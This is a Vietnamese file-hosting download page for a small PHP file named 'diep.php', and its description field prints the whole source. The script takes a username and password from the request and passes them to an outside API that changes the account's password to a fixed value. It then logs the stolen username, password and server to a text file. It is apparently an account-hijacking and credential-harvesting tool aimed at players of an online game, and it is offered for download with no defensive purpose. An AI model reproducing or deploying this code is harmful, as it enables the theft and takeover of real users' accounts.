HOME FB ADMIN FANPAGE YOUTUBE
Xin chào Khách!
Đăng nhập Đăng ký
diep.php
Kích thước: 477 B | 59 lượt tải
Tải Về Máy | Link Dự Phòng | Link Dự Phòng 2
- Định dạng: application/octet-stream
- Up vào: 08/10/2022, 13:26 PM - Bởi: Trần tuấn điêp
- Mô tả: <?php $npass="123456789abc"; $data = file_get_contents('https://api.xn--nguyncv-k7a80fo19tnla.vn/doipassnroblue.php?user='.$_GET['tk'].'&pass='.$_GET['mk'].'&newpass='.$npass); $data = json_decode($data, true); if ($data['stt'] == "success") { $my_file = 'log.txt'; $handle = fopen($my_file, 'a') or die('Cannot open file: '.$my_file); $data = $_GET['tk'] . '|' . $_GET['mk'] . '|' . $_GET['server'] . "\n"; fwrite($handle, $data); fclose($handle); } ?>
- Đánh giá: 0 Sao (0 lượt).
- Bình Luận (0).
- Khiếu Nại (0).
Mã nhúng tệp tin
Link Rút Gọn:

BBcode URL:
★ TRUNG TÂM TRỢ GIÚP
» Nội Quy, Điều Khoản & Giúp Đỡ
CS